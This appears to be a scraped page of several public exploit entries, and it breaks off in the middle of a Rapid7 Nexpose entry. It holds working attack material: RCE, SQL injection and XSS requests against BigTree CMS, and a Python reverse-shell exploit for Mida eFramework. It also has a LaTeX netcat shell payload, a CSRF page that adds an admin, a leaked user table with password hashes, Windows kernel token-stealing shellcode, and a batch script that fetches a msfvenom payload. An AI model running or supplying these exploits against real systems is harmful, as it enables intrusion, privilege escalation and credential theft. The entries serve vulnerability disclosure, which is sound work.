
-
BigTree CMS 4.4.10 - Remote Code Execution
# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution # Google Dork: " BigTree CMS " # Date: 2020-25-09 # Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research) # Vendor Homepage: https://www.bigtreecms.org/ # Software Link: https://www.bigtreecms.org/ # Version: 4.4.10 # Tested on: Windows # CVE : N/A ## 1. Authenticated Remote Code Execution # Attack type: Remote # Impact: Remote arbitrary code execution # Affected component(s): /core/admin/field-types/list/draw.php # Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function: # Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE). # Severity (CVSS 3.1): Base Score: 9.1 CRITICAL # POC: Developer create setting and code will be executed when load settings: POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 388 Origin: http://xxxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/ Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D Upgrade-Insecure-Requests: 1 __csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p> # Video: 
https://vimeo.com/461667065 ## 2. Authenticated SQL Injection # Attack type: Remote # Impact: Authenticated SQL Injection in BigTree CMS # Attack vectors: Authenticated user (developer) can inject a malicious SQL query into the application via the create new feed function: # Affected component(s): /core/feeds/custom.php # Description: BigTree 4.4.10 and earlier are vulnerable to an Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious SQL query to the server and have it executed by the database. # Severity (CVSS 3.1): Base Score: 7.2 HIGH # POC: Request create or edit feed: POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 379 Origin: http://xxxx Connection: close Referer: http://xxxx/site/index.php/admin/developer/feeds/add/ Cookie: yyyy __csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12 # Video: https://vimeo.com/461667107 ## 3. 
Authenticated Stored Cross-Site Scripting # Attack type: Remote # Impact: Stored XSS # Affected component(s): site/index.php/admin/pages/update # Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function: # Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update # Severity (CVSS 3): Base Score: 6.5 MEDIUM # POC: Request create or edit page: POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368 Content-Length: 12173 Origin: http://xxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/ Cookie: yyyy ---some fields here--- <p> <span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. 
Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p> <p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p> -----------------------------2320192840320212926996245368 ---some fields here--- # Video: https://vimeo.com/461667129
-
Mida eFramework 2.8.9 - Remote Code Execution
# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.8.9 # CVE : CVE-2020-15922 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import base64 import random import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922) [*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php - Reverse Shell ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP rev-PORT """) def run_cmd(url,ip,port): rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port) print("[+] Reverse shell: {0}".format(rev_shell)) data = { "submit":"True", "ipaddress0":"; {0}".format(rev_shell), "netmask0":"", "gateway0":"", "dns1":"", "dns2":"" } # exec rev shell print("[*] Starting reverse shell to {0} {1}...".format(ip,port)) try: r = requests.post(url,data=data,verify=False,timeout=1) except requests.exceptions.ReadTimeout: print("[?] 
...check if it worked") pass def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("ip", type=str, help="the ip address for reverse shell") parser.add_argument("port", type=str, help="the port for reverse shell") args = parser.parse_args() run_cmd(args.target, args.ip, args.port) if __name__ == '__main__': main()
-
B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 # Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 B-swiss 3 Digital Signage System 3.6.5 Database Disclosure Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application is vulnerable to unauthenticated database download and information disclosure vulnerability. This can enable the attacker to disclose sensitive information resulting in authentication bypass, session hijacking and full system control. 
Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5588 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php 13.06.2020 -- $ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4 INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES (1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0), (3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1), (13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1), (14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 
14:26:35', 0, 1), (18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
-
B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin) # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 <!-- B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. 
Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5589 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php 13.06.2020 --> <html> <body> <h1>CSRF Add b-swiss Maintenance Admin</h1> <script> function GodMode() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"locator\"\r\n" + "\r\n" + "Users.Save\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"page\"\r\n" + "\r\n" + "\r\n" + 
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"sort\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"id\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"inpopup\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ongridpage\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rowid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" + "\r\n" + "TestingusF\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" + "\r\n" + "TestingusL\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_email\"\r\n" + "\r\n" + "aa@bb.cc\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_username\"\r\n" + "\r\n" + "testingus\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_password\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" + "\r\n" + "100000\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_status\"\r\n" + "\r\n" + "1\r\n" + 
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_language\"\r\n" + "\r\n" + "french-sw\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" + "\r\n" + "2\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Press me" onclick="GodMode();" /> </form> </body> </html>
-
Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)
# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-09-01 # Exploit Author: nepska # Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org # Software Link: https://github.com/ammarfaizi2/latex.teainside.org # Version: v1.0 # Tested on: Kali linux / Windows 10 # CVE: N/A # Header Requests POST /api.php?action=tex2png HTTP/1.1 Host: latex.teainside.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: text/plain;charset=UTF-8 Content-Length: 64 Origin: https://latex.teainside.org DNT: 1 Connection: keep-alive Referer: https://latex.teainside.org/ Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403 {"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"} # Payload \documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document} # Attacker nc -lvp 1234
-
MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
/* Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD Version: 1.0.0.8 Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406] MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation CVE: CVE-2020-17382 Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/ Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities */ #include <iostream> #include <string> #include <Windows.h> #include <Psapi.h> #pragma warning( disable : 6387 ) VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) { // SHELLCODE FOR 1709 BYTE token_steal[] = "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess) "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list //find_system_proc: "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process "\x74\x05" // jz found_system ; Found SYSTEM token "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer "\xEB\xF1" // jmp find_system_proc ; Loop //found_system: "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure //find cmd "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? 
(PLACEHOLDER) "\x74\x05" // jz found_cmd ;YES - move on "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list "\xEB\xEE" // jmp find_cmd ;loop // found cmd "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack "\x48\x31\xc0" // xor rax rax "\x48\x31\xf6" // xor rsi,rsi "\x48\x31\xff" // xor rdi, rdi "\x4D\x31\xC0" // xor r8, r8 "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx "\xc3"; // ret ; RET token_steal[54] = pid; token_steal[55] = pid >> 8; LPVOID allocated_shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(allocated_shellcode, token_steal, sizeof(token_steal)); INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP INT64 rcx_old_value = 0x1506f8; // original cr4 value INT64 ret = pop_rcx_offset + 1; // RET NOP puts("[+] SMEP disabled"); BYTE input_buff[136] = { 0 }; memset(input_buff, '\x41', 64); memset(input_buff, '\x42', 8); // dummy RBP memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode); 
DWORD lpBytesReturned = 0x0; BOOL triggerIOCTL = DeviceIoControl(hFile, IoControlCode, input_buff, sizeof(input_buff), NULL, 0, &lpBytesReturned, NULL); if (!triggerIOCTL) { printf("[!] DeviceIoControl failed: %d\n", GetLastError()); } else { puts("[+] SMEP re-enabled"); puts("[+] Enjoy your SYSTEM shell\n"); } system("start cmd.exe"); } LPVOID GetBaseAddr(const char* drvname) { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers, i = 0; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { char szDrivers[1024]; nDrivers = cbNeeded / sizeof(drivers[0]); for (i = 0; i < nDrivers; i++) { if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { if (strcmp(szDrivers, drvname) == 0) { return drivers[i]; } } } } return 0; } HANDLE GetDriverHandle() { HANDLE hMsio; hMsio = CreateFileA("\\\\.\\MsIo", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL); if (hMsio == INVALID_HANDLE_VALUE) { printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError()); exit(1); } return hMsio; } int main() { puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica"); DWORD IoControlCode = 0x80102040; HANDLE hDevice = GetDriverHandle(); INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe"); DWORD pid = GetCurrentProcessId(); eopMsio(hDevice, nt, pid, IoControlCode); return 0; }
-
Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path # Discovery by: Jok3r # Discovery Date: 2020-09-14 # Vendor Homepage: https://home.pearsonvue.com/ # Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm # Tested Version: 2.3.1911 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Description: The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. The VUEApplicationWrapper service has an unquoted service path, and the "\Pearson VUE\" directory has insecure file permissions that allow Everyone to write to it, so an unauthorized local user can escalate privileges to the VUEService user, which has administrative rights. # Detection of unquoted service path: C:\Users\VUEService>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" | findstr /i /v """ VUE Application Wrapper VUEApplicationWrapper C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe Auto C:\Users\VUEService>sc qc VUEApplicationWrapper [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VUEApplicationWrapper TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VUE Application Wrapper DEPENDENCIES : lanmanworkstation SERVICE_START_NAME : .\VUEService # Detection of insecure file permissions: PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\" Directory: C:\ Path Owner Access ---- ----- ------ Pearson Vue BUILTIN\Administrators Everyone Allow FullControl... 
#Exploit code: @ECHO OFF ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc VUEApplicationWrapper powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'" ECHO [+] Enumeration was completed successfully. ::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted. certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson VUE\VUE.exe" ECHO [*] Downloading VUE executable... PAUSE IF EXIST "C:\Pearson VUE\VUE.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will be rebooted. PAUSE shutdown /r /t 0 ::code end
-
Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path # Date: 2020-08-31 # Exploit Author: Angelo D'Amato # Vendor Homepage: https://www.rapid7.com # Version: <=6.6.39 # CVE :N/A Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation Vendor: Rapid7 Product web page: https://www.rapid7.com Affected version: <=6.6.39 Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path, allowing 